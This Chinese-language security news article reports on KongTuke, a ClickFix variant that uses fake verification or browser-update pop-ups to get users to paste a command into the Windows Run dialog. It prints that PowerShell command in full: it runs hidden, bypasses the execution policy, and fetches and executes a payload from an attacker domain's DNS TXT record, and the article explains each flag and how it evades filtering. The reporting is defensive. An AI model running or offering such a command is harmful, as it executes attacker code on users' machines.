
“ClickFix” 社会工程学攻击活动迎来全新变种,该变种被命名为KongTuke。自 2025 年 12 月底起,这一变种被发现处于活跃传播状态,其显著特征是利用DNS TXT 记录存储并获取恶意载荷,成为该类攻击在规避检测手段上的一次重要转变。
“ClickFix” 攻击手法的典型操作,是攻陷正规网站或搭建虚假钓鱼页面,在页面中弹出带有欺骗性的 “人机验证” 或 “Chrome 浏览器更新” 弹窗。
与索要账户凭据的传统钓鱼攻击不同,ClickFix 会诱骗用户手动执行恶意程序。
- 按下 Windows 键 + R,打开运行对话框;
- 按下 Ctrl+V,将命令粘贴至输入框;
- 按下回车键执行命令。
KongTuke 的 DNS 技术新手段
在 KongTuke 攻击活动中,剪贴板中的内容为一段 PowerShell 命令,其设计目的是从 DNS 记录中获取恶意代码,而非传统的从网页服务器加载。
近期的分析结果显示,被注入的命令遵循如下结构:
powershell -w h -ep bypass -c "iex((Resolve-DnsName -Type TXT payload.bruemald.top -Server 8.8.8.8).Strings -join'')"
- -w h:隐藏 PowerShell 窗口,避免引起用户警觉;
- -ep bypass:绕过本地执行策略,允许恶意脚本运行;
- Resolve-DnsName:这是本次攻击的核心创新点。脚本不再通过 Invoke-WebRequest(wget/curl)从网址下载文件,而是查询受攻击者控制的域名(如 payload.bruemald.top)的 TXT 记录;
- -Server 8.8.8.8:强制通过谷歌公共 DNS 进行查询,绕过企业本地 DNS 的过滤机制或域名拦截策略,避免恶意域名在网络层面被阻断;
- iex:立即执行(Invoke-Expression)从 DNS TXT 记录中获取的文本字符串。
规避检测方式与攻击影响
攻击者将恶意载荷存储在 DNS TXT 记录中,避免了将恶意文件部署在网页服务器上,从而躲过 URL 过滤器或防火墙的扫描检测。
对于网络安全监控系统而言,这类操作产生的流量表现为向公共 DNS 解析器(8.8.8.8)发起的标准 DNS 查询,而这类请求在企业网络环境中通常是被允许的。







发表评论
您还未登录,请先登录。
登录